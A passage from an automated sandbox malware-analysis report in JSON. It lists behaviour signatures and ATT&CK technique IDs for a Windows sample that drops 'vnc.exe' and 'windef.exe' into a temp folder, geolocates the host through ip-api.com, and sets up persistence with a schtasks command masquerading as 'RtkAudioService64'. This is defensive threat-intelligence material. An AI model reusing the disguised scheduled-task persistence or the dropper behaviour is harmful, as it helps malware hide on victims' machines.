\"windef.exe\"\n Observed namespace \"Microsoft.Win32.RegistryKey\" and TypeReference \"OpenSubKey\" in \"windef.exe\"\n Observed namespace \"Microsoft.Win32.RegistryKey\" and TypeReference \"GetValue\" in \"windef.exe\"\n Observed namespace \"Microsoft.Win32.RegistryKey\" and TypeReference \"GetValueNames\" in \"windef.exe\"\n Observed namespace \"Microsoft.Win32.RegistryKey\" and TypeReference \"GetValueKind\" in \"windef.exe\"\n Observed namespace \"Microsoft.Win32.RegistryKey\" and TypeReference \"GetSubKeyNames\" in \"windef.exe\"", "origin": "Static Parser", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-122", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a directory", "description": "\"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"CreateDirectoryW\" with parameter %USERPROFILE%\\btpanui (UID: 00000000-00005916)", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"CreateProcessW\" with parameter \"\"%TEMP%\\vnc.exe\"\" - (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"CreateProcessW\" with parameter \"\"%TEMP%\\windef.exe\"\" - (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"CreateProcessW\" with parameter \"C:\\3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" - (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\schtasks.exe\" /create /tn RtkAudioService64 /tr \"%USERPROFILE%\\btpanui\\SystemPropertiesPerformance.exe\" /s\" - (UID: 00000000-00005916)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-7", "type": 10, "name": "Loads the CLR Loader DLL", "description": "\"windef.exe\" loaded module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll\" at 63DC0000\n \"windef.exe\" loaded module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll\" at 64570000", "origin": "Loaded Module", "attck_id": "T1620", "attck_id_wiki": "https://attack.mitre.org/techniques/T1620"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-126", "relevance": 1, "name": "Dotnet source code contains suspicious native API", "description": "Observed API \"LoadLibrary\" in \"windef.exe\"\n Observed API \"GetProcAddress\" in \"windef.exe\"\n Observed API \"MapVirtualKeyEx\" in \"windef.exe\"", "origin": "Static Parser", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"vnc.exe\" (UID: 00000000-00006112)\n Spawned process \"svchost.exe\" with commandline \"-k\" (UID: 00000000-00005856)\n Spawned process \"windef.exe\" (UID: 00000000-00006132)\n Spawned process \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" (UID: 00000000-00006108)\n Spawned process \"schtasks.exe\" with commandline \"/create /tn RtkAudioService64 /tr \"%USERPROFILE%\\\\btpanui\\\\Syste ...\" (UID: 00000000-00004040)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"vnc.exe\" (UID: 00000000-00006112)\n Spawned process \"svchost.exe\" with commandline \"-k\" (UID: 00000000-00005856)\n Spawned process \"windef.exe\" (UID: 00000000-00006132)\n Spawned process \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" (UID: 00000000-00006108)\n Spawned process \"schtasks.exe\" with commandline \"/create /tn RtkAudioService64 /tr \"%USERPROFILE%\\\\btpanui\\\\Syste ...\" (UID: 00000000-00004040)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-1", "type": 7, "relevance": 1, "name": "Contacts server", "description": "\"<IPv4>:80\"", "origin": "Network Traffic", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac\" was detected as \"AutoIt\" and name: \"Library\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"SystemPropertiesPerformance.exe\" was detected as \"AutoIt\" and name: \"Library\"\n \"SystemPropertiesPerformance.exe\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"SystemPropertiesPerformance.exe\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"SystemPropertiesPerformance.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"vnc.exe\" was detected as \"AutoIt\" and name: \"Library\"\n \"vnc.exe\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"vnc.exe\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"vnc.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"windef.exe\" was detected as \"AutoIt\" and name: \"Library\"\n \"windef.exe\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"windef.exe\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"windef.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-2", "type": 7, "relevance": 5, "name": "GETs files from a webserver", "description": "\"GET /json/ HTTP/1.1\nUser-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0\nHost: ip-api.com\nConnection: Keep-Alive\" Response ==> HTTP/1.1 200 OK\nDate: Thu\n 06 Feb 2025 09:14:56 GMT\nContent-Type: application/json; charset=utf-8\nContent-Length: 287\nAccess-Control-Allow-Origin: *\nX-Ttl: 36\nX-Rl: 43 with response body ==>7B22737461747573223A2273756363657373222C22636F756E747279223A22556E6974656420537461746573222C22636F756E747279436F6465223A22555322.......", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-0", "type": 7, "relevance": 1, "name": "Contacts domains", "description": "\"ip-api.com\"", "origin": "Network Traffic", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-51", "type": 7, "relevance": 1, "name": "Queries DNS server", "description": "\"ip-api.com\"", "origin": "Network Traffic", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-124", "relevance": 3, "name": "PE file has a big virtual size section", "description": "Virtual size of \".rsrc\" is \"0x13a7f8\" greater than 0x100000", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-154", "name": "File contains dynamic base/NX flags", "description": "\"vnc.exe\" has flags like IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE\n IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE\n IMAGE_DLLCHARACTERISTICS_NX_COMPAT\n \"windef.exe\" has flags like IMAGE_DLLCHARACTERISTICS_NO_SEH\n IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE\n IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE\n IMAGE_DLLCHARACTERISTICS_NX_COMPAT", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac\" has an executable section named \".text\"\n \"SystemPropertiesPerformance.exe\" has an executable section named \".text\"\n \"vnc.exe\" has an executable section named \".text\"\n \"windef.exe\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac\" has an writable section named \".data\"\n \"SystemPropertiesPerformance.exe\" has an writable section named \".data\"\n \"vnc.exe\" has an writable section named \".data\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-125", "relevance": 3, "name": "PE file has a big raw size section", "description": "Raw size of \".rsrc\" is \"0x13a800\" greater than 0x100000", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-146", "name": "PE file contains Debug data directory", "description": "\"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"\n \"SystemPropertiesPerformance.exe\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"\n \"vnc.exe\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-139", "relevance": 1, "name": "Dotnet code contains ability to modify/delete registry", "description": "Observed namespace \"Microsoft.Win32.RegistryKey\" and TypeReference \"SetValue\" in \"windef.exe\"\n Observed namespace \"Microsoft.Win32.RegistryKey\" and TypeReference \"DeleteValue\" in \"windef.exe\"\n Observed namespace \"Microsoft.Win32.RegistryKey\" and TypeReference \"CreateSubKey\" in \"windef.exe\"\n Observed namespace \"Microsoft.Win32.RegistryKey\" and TypeReference \"DeleteSubKeyTree\" in \"windef.exe\"", "origin": "Static Parser", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac\" was detected as \"VC8 -> Microsoft Corporation\"\n \"SystemPropertiesPerformance.exe\" was detected as \"VC8 -> Microsoft Corporation\"\n \"windef.exe\" was detected as \"Microsoft visual C# v7.0 / Basic .NET\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "registry-26", "type": 3, "relevance": 2, "name": "Reads the windows installation language", "description": "\"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")\n \"windef.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")", "origin": "Registry Access", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "binary-33", "type": 8, "relevance": 3, "name": "Drops executable files inside temp directory", "description": "\"vnc.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\vnc.exe]- [targetUID: 00000000-00005916]\n \"windef.exe\" has type \"PE32 executable (GUI) Intel 80386 Mono/.Net assembly for MS Windows\"- Location: [%TEMP%\\windef.exe]- [targetUID: 00000000-00005916]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" trying to access non-existent file \"C:\\WSOCK32.dll\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" trying to access non-existent file \"C:\\VERSION.dll\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" trying to access non-existent file \"C:\\WINMM.dll\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" trying to access non-existent file \"C:\\MPR.dll\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" trying to access non-existent file \"C:\\IPHLPAPI.DLL\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" trying to access non-existent file \"C:\\WINNSI.DLL\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" trying to access non-existent file \"C:\\UxTheme.dll\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" trying to access non-existent file \"C:\\CRYPTBASE.dll\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" trying to access non-existent file \"C:\\dwmapi.dll\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" trying to access non-existent file \"C:\\CRYPTSP.dll\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" trying to access non-existent file \"C:\\PROPSYS.dll\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" trying to access non-existent file \"C:\\ntmarta.dll\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" trying to access non-existent file \"C:\\apphelp.dll\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" trying to access non-existent file \"C:\\Secur32.dll\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" trying to access non-existent file \"C:\\SSPICLI.DLL\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" trying to access non-existent file \"C:\\api-ms-win-downlevel-advapi32-l2-1-0.dll\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" trying to access non-existent file \"C:\\WSOCK32.DLL\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" trying to access non-existent file \"C:\\VERSION.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"windef.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"schtasks.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" reads file \"c:\\users\\%osuser%\\desktop\\desktop.ini\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" reads file \"c:\\users\\%osuser%\\searches\\desktop.ini\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" reads file \"c:\\users\\%osuser%\\videos\\desktop.ini\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" reads file \"c:\\users\\%osuser%\\pictures\\desktop.ini\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" reads file \"c:\\users\\%osuser%\\contacts\\desktop.ini\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" reads file \"c:\\users\\%osuser%\\favorites\\desktop.ini\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" reads file \"c:\\users\\%osuser%\\music\\desktop.ini\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" reads file \"c:\\users\\%osuser%\\downloads\\desktop.ini\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" reads file \"c:\\users\\%osuser%\\documents\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"\"; Value: \"\")\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CLSID\\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\"; Key: \"\"; Value: \"\")\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\"; Key: \"\"; Value: \"\")\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CLSID\\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\\PROGID\"; Key: \"\"; Value: \"\")\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\\PROGID\"; Key: \"\"; Value: \"\")\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\"; Key: \"\"; Value: \"\")\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\USERSFILES\\NAMESPACE\"; Key: \"\"; Value: \"\")\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\USERSFILES\\NAMESPACE\\DELEGATEFOLDERS\"; Key: \"\"; Value: \"\")\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\USERSFILES\\NAMESPACE\"; Key: \"\"; Value: \"\")\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\USERSFILES\\NAMESPACE\\DELEGATEFOLDERS\\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\"; Key: \"\"; Value: \"\")\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\USERSFILES\\NAMESPACE\\DELEGATEFOLDERS\"; Key: \"\"; Value: \"\")\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\SESSIONINFO\\1\"; Key: \"\"; Value: \"\")\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\SESSIONINFO\\1\\USERSFILES\\NAMESPACE\"; Key: \"\"; Value: \"\")\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\SESSIONINFO\\1\\USERSFILES\\NAMESPACE\\DELEGATEFOLDERS\"; Key: \"\"; Value: \"\")\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CLSID\\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\\INPROCSERVER32\"; Key: \"\"; Value: \"\")\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\\INPROCSERVER32\"; Key: \"\"; Value: \"\")\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CLSID\\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\\INSTANCE\"; Key: \"\"; Value: \"\")\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\\INSTANCE\"; Key: \"\"; Value: \"\")\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CLSID\\{0E5AAE11-A475-4C5B-AB00-C66DE400274E}\\INPROCSERVER32\"; Key: \"\"; Value: \"\")\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{0E5AAE11-A475-4C5B-AB00-C66DE400274E}\\INPROCSERVER32\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" connecting to \"\\ThemeApiPort\"\n \"windef.exe\" connecting to \"\\ThemeApiPort\"\n \"schtasks.exe\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Caches\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Caches\"\n \"windef.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\clr.dll\"\n \"windef.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\mscorwks.dll\"\n \"windef.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\clr.dll\"\n \"windef.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\mscorwks.dll\"\n \"windef.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\clr.dll\"\n \"windef.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\counters.dat\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\\counters.dat\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" trying to touch file \"C:\\WSOCK32.dll\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" trying to touch file \"C:\\Windows\\system32\\WSOCK32.dll\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" trying to touch file \"C:\\VERSION.dll\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" trying to touch file \"C:\\Windows\\system32\\VERSION.dll\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" trying to touch file \"C:\\WINMM.dll\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" trying to touch file \"C:\\Windows\\system32\\WINMM.dll\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" trying to touch file \"C:\\3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe.Local\\\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" trying to touch file \"C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" trying to touch file \"C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d\\COMCTL32.dll\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" trying to touch file \"C:\\MPR.dll\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" trying to touch file \"C:\\Windows\\system32\\MPR.dll\"\n 